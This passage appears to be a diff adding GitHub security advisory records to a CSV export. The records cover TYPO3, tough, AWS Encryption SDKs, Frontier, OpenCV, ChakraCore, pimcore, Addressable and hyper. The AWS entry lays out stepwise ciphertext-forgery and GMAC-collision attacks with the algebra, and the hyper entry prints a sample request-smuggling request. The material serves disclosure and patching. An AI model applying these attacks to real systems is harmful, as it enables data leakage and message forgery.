'url': 'https://www.debian.org/security/2021/dsa-5018'}, {'type': 'WEB', 'url': 'https://www.tenable.com/security/research/tra-2021-14'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-21T14:33:55Z', 'nvd_published_at': '2021-10-20T21:15:00Z'}"
+1.4.0,GHSA-m2jh-fxw4-gphm,2021-10-05T18:47:01Z,2021-10-05T20:23:35Z,,['CVE-2021-41114'],HTTP Host Header Injection,"### Meta
+* CVSS: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:F/RL:O/RC:C` (3.5)
+
+### Problem
+It has been discovered that TYPO3 CMS is susceptible to host spoofing due to improper validation of the HTTP _Host_ header. TYPO3 uses the HTTP _Host_ header, for example, to generate absolute URLs during the frontend rendering process. Since the host header itself is provided by the client, it can be forged to any value, even in a name-based virtual hosts environment.
+
+This vulnerability is the same as described in [TYPO3-CORE-SA-2014-001 (CVE-2014-3941)](https://typo3.org/security/advisory/typo3-core-sa-2014-001/). A regression, introduced during TYPO3 v11 development, led to this situation. The already existing setting _$GLOBALS['TYPO3_CONF_VARS']['SYS']['trustedHostsPattern']_ (used as an effective mitigation strategy in previous TYPO3 versions) was not evaluated anymore, and reintroduced the vulnerability.
+
+### Solution
+Update your instance to TYPO3 version 11.5.0 which addresses the problem described.
+
+### Credits
+Thanks to TYPO3 framework merger Benjamin Franzke who reported and fixed the issue.
+
+### References
+* [TYPO3-CORE-SA-2021-015](https://typo3.org/security/advisory/typo3-core-sa-2021-015)
+* [CVE-2014-3941](https://nvd.nist.gov/vuln/detail/CVE-2014-3941) reintroduced in TYPO3 v11.0.0","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '11.5.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/TYPO3/typo3/security/advisories/GHSA-m2jh-fxw4-gphm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2014-3941'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41114'}, {'type': 'WEB', 'url': 'https://github.com/TYPO3/typo3/commit/5cbff85506cebe343e5ae59228977547cf8e3cf4'}, {'type': 'PACKAGE', 'url': 'https://github.com/TYPO3/typo3'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-core-sa-2021-015'}]","{'cwe_ids': ['CWE-20', 'CWE-644'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-05T18:47:01Z', 'nvd_published_at': '2021-10-05T18:15:00Z'}"
+1.4.0,GHSA-r56q-vv3c-6g9c,2021-10-19T18:06:09Z,2021-10-19T20:16:26Z,,['CVE-2021-41150'],Improper sanitization of delegated role names,"### Impact
+The tough library, prior to 0.12.0, does not properly sanitize delegated role names when caching a repository, or when loading a repository from the filesystem. When the repository is cached or loaded, files ending with the .json extension could be overwritten with role metadata anywhere on the system.
+
+AWS would like to thank https://github.com/jku for reporting this issue.
+
+### Patches
+A fix is available in version 0.12.0.
+
+### Workarounds
+No workarounds to this issue are known.
+
+### References
+https://github.com/theupdateframework/python-tuf/security/advisories/GHSA-wjw6-2cqr-j4qr
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'tough'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.12.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/awslabs/tough/security/advisories/GHSA-r56q-vv3c-6g9c'}, {'type': 'WEB', 'url': 'https://github.com/theupdateframework/python-tuf/security/advisories/GHSA-wjw6-2cqr-j4qr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41150'}, {'type': 'WEB', 'url': 'https://github.com/awslabs/tough/commit/1809b9bd1106d78a51fbea3071aa97a3530bac9a'}, {'type': 'PACKAGE', 'url': 'https://github.com/awslabs/tough'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-19T18:06:09Z', 'nvd_published_at': '2021-10-19T20:15:00Z'}"
+1.4.0,GHSA-wqgp-vphw-hphf,2021-10-08T22:24:29Z,2021-10-12T16:01:12Z,,['CVE-2020-8897'],Security issues in AWS KMS and AWS Encryption SDKs: in-band protocol negotiation and robustness,"Authors: Thai ""[thaidn](https://twitter.com/xorninja)"" Duong
+
+# Summary
+
+The following security vulnerabilities was discovered and reported to Amazon, affecting AWS KMS and all versions of [AWS Encryption SDKs](https://docs.aws.amazon.com/encryption-sdk/latest/developer-guide/introduction.html) prior to version 2.0.0:
+
+* **Information leakage**: an attacker can create ciphertexts that would leak the user’s AWS account ID, encryption context, user agent, and IP address upon decryption
+* **Ciphertext forgery**: an attacker can create ciphertexts that are accepted by other users
+* **Robustness**: an attacker can create ciphertexts that decrypt to different plaintexts for different users
+
+The first two bugs are somewhat surprising because they show that the ciphertext format can lead to vulnerabilities. These bugs (and the infamous [alg: ""None""](https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries/) bugs in JWT) belong to a class of vulnerabilities called **in-band protocol negotiation**. This is the second time we’ve found in-band protocol negotiation vulnerabilities in AWS cryptography libraries; see this [bug](https://github.com/google/security-research/security/advisories/GHSA-7f33-f4f5-xwgw) in S3 Crypto SDK discovered by my colleague Sophie Schmieg.
+
+In JWT and S3 SDK the culprit is the algorithm field—here it is the key ID. Because the key ID is used to determine which decryption key to use, it can’t be meaningfully authenticated despite being under the attacker’s control. If the key ID is a URL indicating where to fetch the key, the attacker can replace it with their own URL, and learn side-channel information such as the timing and machines on which the decryption happens (this can also lead to [SSRF](https://portswigger.net/web-security/ssrf) issues, but that’s another topic for another day).
+
+In AWS, the key ID is a unique [Amazon Resource Name](https://docs.aws.amazon.com/general/latest/gr/aws-arns-and-namespaces.html). If an attacker were to capture a ciphertext from a user and replace its key ID with their own, the victim’s AWS account ID, encryption context, user agent, and IP address would be logged to the attacker’s AWS account whenever the victim attempted to decrypt the modified ciphertext.
+
+The last bug shows that the non-committing property of AES-GCM (and other AEAD ciphers such as [AES-GCM-SIV](https://keymaterial.net/2020/09/07/invisible-salamanders-in-aes-gcm-siv/) or (X)ChaCha20Poly1305) is especially problematic in multi-recipient settings. These ciphers have a property that can cause nonidentical plaintexts when decrypting a single ciphertext with two different keys! For example, you can send a single encrypted email to Alice and Bob which, upon decryption, reads “attack” to Alice and “retreat” to Bob. The AWS Encryption SDKs are vulnerable to this attack because they allow a single ciphertext to be generated for multiple recipients, with each decrypting using a different key. I believe this kind of problem is prevalent. I briefly looked at [JWE](https://tools.ietf.org/html/rfc7516) and I think it is vulnerable.
+
+# Mitigations
+
+Amazon has fixed these bugs in release 2.0.0 of the SDKs. A new major version was required because, unfortunately, the fix for the last bug requires a breaking change from earlier versions. All users are recommended to upgrade. More details about Amazon’s mitigations can be found in [their announcement](https://aws.amazon.com/blogs/security/improved-client-side-encryption-explicit-keyids-and-key-commitment/).
+
+We’re collaborating with Shay Gueron on a paper regarding fast committing AEADs.
+
+# Vulnerabilities
+
+## Information Leakage
+
+The [Encrypt](https://docs.aws.amazon.com/kms/latest/APIReference/API_Encrypt.html) API in AWS KMS encrypts plaintext into ciphertext by using a customer master key (CMK). The ciphertext format is undocumented, but it contains metadata that specifies the CMK and the encryption algorithm. I reverse-engineered the format and found the location of the CMK. Externally the CMK is identified by its key ARN, but within a ciphertext it is represented by an internal ID, which remained stable during my testing.
+
+When I replaced the internal ID of a CMK in a ciphertext with the internal ID of another CMK, I found that AWS KMS attempted to decrypt the ciphertext with the new CMK. The encryption failed and the failure event—including the AWS Account ID, the user agent and the IP address of the caller—was logged to Cloud Trail in the account that owned the replacement CMK.
+
+This enables the following attack:
+* The attacker creates a CMK that has a key policy that allows access from everyone. This requires no prior knowledge about the victim.
+* The attacker intercepts a ciphertext from the victim, and replaces its CMK with their CMK.
+* Whenever the victim attempts to decrypt the modified ciphertext, the attacker learns the timing of such actions, the victim’s AWS Account ID, user agent, encryption context, and IP address.
+
+This attack requires the victim to have an IAM policy that allows them to access the attacker’s CMK. I found that this practice was allowed by the AWS Visual Policy Editor, but I don’t know whether it is common.
+
+The AWS Encryption SDKs also succumb to this attack. The SDKs implement envelope encryption: encrypting data with a data encryption key (DEK) and then wrapping the DEK with a CMK using the Encrypt API in AWS KMS. The wrapped DEK is stored as part of the final ciphertext (format is defined [here](https://docs.aws.amazon.com/encryption-sdk/latest/developer-guide/message-format.html)). The attacker can mount this attack by replacing the CMK in the wrapped DEK with their own.
+
+```
+{
+ ""eventVersion"": ""1.05"",
+ ""userIdentity"": {
+ ""type"": ""AWSAccount"",
+ ""principalId"": """",
+ ""accountId"": """"
+ },
+ ""eventTime"": ""2020-06-21T21:05:04Z"",
+ ""eventSource"": ""kms.amazonaws.com"",
+ ""eventName"": ""Decrypt"",
+ ""awsRegion"": ""us-west-2"",
+ ""sourceIPAddress"": """",
+ ""userAgent"": """",
+ ""errorCode"": ""InvalidCiphertextException"",
+ ""requestParameters"": {
+ // The encryption context might include other data from the victim
+ ""encryptionContext"": {
+ ""aws-crypto-public-key"": ""AzfNOGOnNYFmpHspKrAm1L6XtRybONkmkhmB/IriKSA7b2NsV4MEPMph9yX2KTPKWw==""
+ },
+ ""encryptionAlgorithm"": ""SYMMETRIC_DEFAULT""
+ },
+ ""responseElements"": null,
+ ""requestID"": ""aeced8e8-75a2-42c3-96ac-d1fa2a1c5ee6"",
+ ""eventID"": ""780a0a6e-4ad8-43d4-a426-75d05022f870"",
+ ""readOnly"": true,
+ ""resources"": [
+ {
+ ""accountId"": """",
+ ""type"": ""AWS::KMS::Key"",
+ ""ARN"":
+ }
+ ],
+ ""eventType"": ""AwsApiCall"",
+ ""recipientAccountId"": """",
+ ""sharedEventID"": ""033e147c-8a36-42f5-9d6c-9e071eb752b7""
+}
+```
+**Figure 1: A failure event logged to the attacker’s Cloud Trail when the victim attempted to decrypt a modified ciphertext containing the attacker’s CMK.**
+
+## Ciphertext Forgery
+
+The [Decrypt](https://docs.aws.amazon.com/kms/latest/APIReference/API_Decrypt.html) API in AWS KMS doesn’t require the caller to specify the CMK. This parameter is required only when the ciphertext was encrypted under an asymmetric CMK. Otherwise, AWS KMS uses the metadata that it adds to the ciphertext blob to determine which CMK was used to encrypt the ciphertext.
+
+This leads to the following attack:
+* The attacker creates a CMK that has a key policy that allows access from everyone. This requires no prior knowledge about the victim.
+* The attacker generates a ciphertext by calling the Encrypt API with their key.
+* The attacker intercepts a ciphertext from the victim, and replaces it entirely with their ciphertext.
+* The victim successfully decrypts the ciphertext, as if it was encrypted under their own key. The attacker also learns when this happened, the victim’s AWS Account ID, user agent, encryption context, and IP address.
+
+Similar to the information leakage attack, this attack also requires the victim to have an IAM policy that allows them to access the attacker’s CMK.
+
+The AWS Encryption SDKs also succumb to this attack. They don’t specify the CMK when they call the Decrypt API to unwrap the DEK.
+
+## Robustness
+
+The AWS Encryption SDKs allow a single ciphertext to be generated for multiple recipients, with each decrypting using a different key. To that end, it wraps the DEK multiple times, each under a different CMK. The wrapped DEKs can be combined to form a single ciphertext which can be sent to multiple recipients who can use their own credentials to decrypt it. It’s reasonable to expect that all recipients should decrypt the ciphertext to an identical plaintext. However, because of the use of AES-GMAC and AES-GCM, it’s possible to create a ciphertext that decrypts to two valid yet different plaintexts for two different users. In other words, the AWS Encryption SDKs are [not](https://eprint.iacr.org/2008/440.pdf) [robust](https://eprint.iacr.org/2019/016.pdf).
+
+The encryption of a message under two CMKs can be summarized as follows:
+* A DEK is randomly generated, and two wrapped DEKs are produced by calling the Encrypt API using the two CMKs
+* A per-message AES-GCM key (K) is derived using HKDF from the DEK, a randomly generated message ID, and a fixed algorithm ID.
+* A header is formed from the wrapped DEKs, the encryption context, and other metadata. A header authentication tag is computed on the header using AES-GMAC with K and a zero IV.
+* The message is encrypted using AES-GCM with K, a non-zero IV, and fixed associated additional data. This produces a message authentication tag.
+* The ciphertext consists of the header, the header authentication tag, the encrypted message, and the message authentication tag.
+
+(There’s also a self-signed digital signature that is irrelevant to this discussion).
+
+In order to decrypt a ciphertext, the AWS Encryption SDKs loops over the list of wrapped DEKs and returns the first one that it can successfully unwrap. The attacker therefore can wrap a unique DEK for each recipient. Next, the attacker exploits the non-committing property of GMAC to produce two messages that have the same GMAC tag under two different keys. The attacker has to do this twice, one for the header authentication tag and one for the message authentication tag.
+
+```
+Given a data blob B of one 128-bit block B_1, a GMAC tag is computed as follows:
+
+B_1 * H^2 + B_len * H + J
+
+where H and J depends on the key and B_len depends on the length of B.
+
+To find a message that can produce the same tag under two different keys, one
+can add append to B a new block B_2 whose value can be deduced by solving
+an algebraic equation. That is, we want to find B_2 such that:
+
+B_1 * H^3 + B_2 * H^2 + B_len * H + J = B_1 * H’^3 + B_2 * H’^2 + B_len * H’ + J’
+
+where H’ and J’ are the corresponding H and J of the other key.
+
+B_2 is the only unknown value in this equation, thus it can be computed using
+finite field arithmetics of GF(2^128):
+
+B_2 = [B_1 * (H^3+H’^3) + B_len * (H + H’) + J + J’] * (H^2 + H’^2)^-1.
+```
+**Figure 2: How to find a message that has the same GMAC tag under two different keys.**
+
+The overall attack works as follows:
+* The attacker generates a random DEK, derives a per-message key K, and encrypts message M with it using AES in counter mode. This generates a ciphertext C.
+* The attacker generates another random DEK’, derives a per-message key K’, and performs trial decryption of C until the decrypted message M’ has desirable properties. For example, if the attacker wants the first bit of M’ different from that of M, this process should only take a few attempts.
+* The attacker finds a block C* such that the GMAC of C’ = C || C* under K and K’ are identical. Denote this tag C’_tag.
+* The attacker wraps DEK and DEK’ under two recipients’ CMK.
+* The attacker forms a header H and adds a block H* to the encryption context such that the new H’ has the same authentication tag H’_tag under K and K’.
+* The attacker output H’, H’_tag, C’, C’_tag.
+
+This attack is similar to the one discovered in [Facebook Messenger](https://eprint.iacr.org/2019/016.pdf).
+
+# Acknowledgement
+
+I’m grateful to Jen Barnason for carefully editing this advisory. I will never publish anything without her approval! I want to thank my friend and coworker Sophie “Queen of Hashing” Schmieg for wonderful discussions and for showing me how the arithmetic in GF(2^128) works. I want to thank Jonathan Bannet for asking the questions that led to this work.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.amazonaws:aws-encryption-sdk-java'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.0'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'aws-encryption-sdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/google/security-research/security/advisories/GHSA-wqgp-vphw-hphf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8897'}, {'type': 'WEB', 'url': 'https://aws.amazon.com/blogs/security/improved-client-side-encryption-explicit-keyids-and-key-commitment/'}]","{'cwe_ids': ['CWE-327'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T22:24:29Z', 'nvd_published_at': '2020-11-16T12:15:00Z'}"
+1.4.0,GHSA-vj62-g63v-f8mf,2021-10-13T17:34:31Z,2021-10-13T18:53:38Z,,['CVE-2021-41138'],Validity check missing in Frontier,"### Impact
+
+In the newly introduced signed Frontier-specific extrinsic for `pallet-ethereum`, a large part of transaction validation logic was only called in transaction pool validation, but not in block execution. Malicious validators can take advantage of this to put invalid transactions into a block.
+
+The attack is limited in that the signature is always validated, and the majority of the validation is done again in the subsequent `pallet-evm` execution logic. However, do note that a chain ID replay attack was possible. In addition, spamming attacks are of main concerns, while they are limited by Substrate block size limits and other factors.
+
+### Patches
+
+The issue is patched in commit 146bb48849e5393004be5c88beefe76fdf009aba.
+
+### References
+
+Patch PR: https://github.com/paritytech/frontier/pull/495
+
+### For more information
+
+If you have any questions or comments about this advisory:
+* Open an issue in [Frontier repo](https://github.com/paritytech/frontier/issues)
+
+### Special thanks
+
+Special thanks to @librelois, @nanocryk and the Moonbeam team for reporting and fixing this security vulnerability.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'frontier'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/paritytech/frontier/security/advisories/GHSA-vj62-g63v-f8mf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41138'}, {'type': 'WEB', 'url': 'https://github.com/paritytech/frontier/pull/495'}, {'type': 'WEB', 'url': 'https://github.com/paritytech/frontier/pull/497'}, {'type': 'WEB', 'url': 'https://github.com/paritytech/frontier/commit/146bb48849e5393004be5c88beefe76fdf009aba'}, {'type': 'PACKAGE', 'url': 'https://github.com/paritytech/frontier'}]","{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-13T17:34:31Z', 'nvd_published_at': '2021-10-13T16:15:00Z'}"
+1.4.0,GHSA-cvhw-2593-5j2q,2021-11-18T15:34:33Z,2021-10-12T22:00:08Z,,['CVE-2016-1516'],Double Free in OpenCV,OpenCV 3.0.0 has a double free issue that allows attackers to execute arbitrary code. This issue was fixed in OpenCV version 3.3.1 (corresponding to OpenCV-Python and and OpenCV-Contrib-Python 3.3.1.11).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.10'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.10'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-1516'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/5956'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/pull/9376'}, {'type': 'WEB', 'url': 'https://arxiv.org/pdf/1701.04739.pdf'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2018/07/msg00030.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/10/msg00028.html'}]","{'cwe_ids': ['CWE-415'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T18:44:07Z', 'nvd_published_at': '2017-04-10T03:59:00Z'}"
+1.4.0,GHSA-6cc6-66f5-mxjj,2021-07-27T13:43:59Z,2021-07-28T18:58:03Z,,['CVE-2020-0826'],Out-of-bounds write in ChakraCore,"A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-0768, CVE-2020-0823, CVE-2020-0825, CVE-2020-0827, CVE-2020-0828, CVE-2020-0829, CVE-2020-0830, CVE-2020-0831, CVE-2020-0832, CVE-2020-0833, CVE-2020-0848.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.17'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-0826'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0826'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-27T13:43:59Z', 'nvd_published_at': '2020-03-12T16:15:00Z'}"
+1.4.0,GHSA-g8jx-66p8-vcm2,2021-07-28T17:37:01Z,2021-07-13T17:42:31Z,,['CVE-2021-23405'],SQL injection in pimcore/pimcore,This affects the package pimcore/pimcore before 10.0.7. This issue exists due to the absence of check on the storeId parameter in the method collectionsActionGet and groupsActionGet method within the ClassificationstoreController class.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.0.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23405'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/pull/9572'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-PHP-PIMCOREPIMCORE-1316297'}]","{'cwe_ids': ['CWE-89'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-13T16:18:51Z', 'nvd_published_at': '2021-07-09T13:15:00Z'}"
+1.4.0,GHSA-jxhc-q857-3j6g,2021-08-30T22:21:20Z,2021-07-12T16:58:33Z,,['CVE-2021-32740'],Regular Expression Denial of Service in Addressable templates,"### Impact
+
+Within the URI template implementation in Addressable, a maliciously crafted template may result in uncontrolled resource consumption, leading to denial of service when matched against a URI. In typical usage, templates would not normally be read from untrusted user input, but nonetheless, no previous security advisory for Addressable has cautioned against doing this. Users of the parsing capabilities in Addressable but not the URI template capabilities are unaffected.
+
+### Patches
+
+The vulnerability was introduced in version 2.3.0 (previously yanked) and has been present in all subsequent versions up to, and including, 2.7.0. It is fixed in version 2.8.0.
+
+### Workarounds
+
+The vulnerability can be avoided by only creating Template objects from trusted sources that have been validated not to produce catastrophic backtracking.
+
+### References
+
+- https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS
+- https://cwe.mitre.org/data/definitions/1333.html
+- https://www.regular-expressions.info/catastrophic.html
+
+### For more information
+If you have any questions or comments about this advisory:
+* [Open an issue](https://github.com/sporkmonger/addressable/issues)
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'addressable'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.8.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.7.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/sporkmonger/addressable/security/advisories/GHSA-jxhc-q857-3j6g'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32740'}, {'type': 'WEB', 'url': 'https://github.com/sporkmonger/addressable/commit/0d8a3127e35886ce9284810a7f2438bff6b43cbc'}, {'type': 'WEB', 'url': 'https://github.com/sporkmonger/addressable/commit/89c76130ce255c601f642a018cb5fb5a80e679a7'}, {'type': 'WEB', 'url': 'https://github.com/sporkmonger/addressable/commit/92685096b1f7235ed8986c03ce30a24972eed848#diff-fb36d3dc67e6565ffde17e666a98697f48e76dac38fabf1bb9e97cdf3b583d76'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-jxhc-q857-3j6g'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/addressable/CVE-2021-32740.yml'}, {'type': 'PACKAGE', 'url': 'https://github.com/sporkmonger/addressable'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SDFQM2NHNAZ3NNUQZEJTYECYZYXV4UDS/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WYPVOOQU7UB277UUERJMCNQLRCXRCIQ5/'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-06T15:25:32Z', 'nvd_published_at': '2021-07-06T15:15:00Z'}"
+1.4.0,GHSA-f3pg-qwvg-p99c,2021-09-07T21:49:21Z,2021-07-12T16:54:20Z,,['CVE-2021-32715'],Lenient Parsing of Content-Length Header When Prefixed with Plus Sign,"### Summary
+
+hyper's HTTP/1 server code had a flaw that incorrectly parses and accepts requests with a `Content-Length` header with a prefixed plus sign, when it should have been rejected as illegal. This combined with an upstream HTTP proxy that doesn't parse such `Content-Length` headers, but forwards them, can result in ""request smuggling"" or ""desync attacks"".
+
+### Vulnerability
+
+The flaw exists in all prior versions of hyper, if built with [`rustc` v1.5.0 or newer](https://github.com/rust-lang/rust/pull/28826/commits/123a83326fb95366e94a3be1a74775df4db97739).
+
+Example:
+
+```
+GET / HTTP/1.1
+Host: example.com
+Content-Length: +3
+
+abc
+```
+
+This request gets accepted and hyper reads the body as abc. The request _should_ be rejected, according to RFC 7230, since the ABNF for `Content-Length` only allows for `DIGIT`s. This is due to using the `FromStr` implementation for `u64` in the standard library. By differing from the spec, it is possible to send requests like these to endpoints that have different HTTP implementations, with different interpretations of the payload semantics, and cause ""desync attacks"".
+
+In this particular case, an upstream proxy would need to error when parsing the `Content-Length`, but _not_ reject the request (swallowing its own error), and forwarding the request as-is with the `Content-Length` still included. _Then_ the upstream proxy and hyper would disagree on the length of the request body. The combination of these factors would be extremely rare.
+
+Read more about desync attacks: https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn
+
+### Impact
+
+To determine if vulnerable, all these things must be true:
+
+- **Using hyper as an HTTP server**. While the lenient decoder also exists in the client, a vulnerability does not exist around _responses_.
+- **Using HTTP/1**. The HTTP/2 code uses a stricter parser.
+- **Using a vulnerable HTTP proxy upstream to hyper**. If an upstream proxy correctly rejects the illegal `Content-Length` header, *OR* can parse the length with the plus sign, the desync attack cannot succeed.
+
+### Patches
+
+We have released the following patch versions:
+
+- v0.14.10 (to be released when this advisor is published)
+
+### Workarounds
+
+Besides upgrading hyper, you can take the following options:
+
+- Reject requests manually that contain a plus sign prefix in the `Content-Length` header.
+- Ensure any upstream proxy handles `Content-Length` headers with a plus sign prefix.
+
+### Credits
+This issue was initially reported by [Mattias Grenfeldt](https://grenfeldt.dev/) and Asta Olofsson.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'hyper'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.14.10'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/hyperium/hyper/security/advisories/GHSA-f3pg-qwvg-p99c'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32715'}, {'type': 'WEB', 'url': 'https://github.com/rust-lang/rust/pull/28826/commits/123a83326fb95366e94a3be1a74775df4db97739'}, {'type': 'WEB', 'url': 'https://github.com/hyperium/hyper/commit/1fb719e0b61a4f3d911562a436a2ff05fd7cb759'}, {'type': 'PACKAGE', 'url': 'https://github.com/hyperium/hyper'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0078.html'}]","{'cwe_ids': ['CWE-444'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-07-07T20:08:46Z', 'nvd_published_at': '2021-07-07T20:15:00Z'}"
+1.4.0,GHSA-2qgv-2cv4-g4cg,2021-07-27T14:12:10Z,2021-07-28T18:57:27Z,,['CVE-2020-0832'],Out-of-bounds write in ChakraCore,"A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-0768, CVE-2020-0823, CVE-2020-0825, CVE-2020-0826, CVE-2020-0827, CVE-2020-0828, CVE-2020-0829, CVE-2020-0830, CVE-2020-0831, CVE-2020-0833, CVE-2020-0848.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.17'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-0832'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0832'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-27T14:12:10Z', 'nvd_published_at': '2020-03-12T16:15:00Z'}"
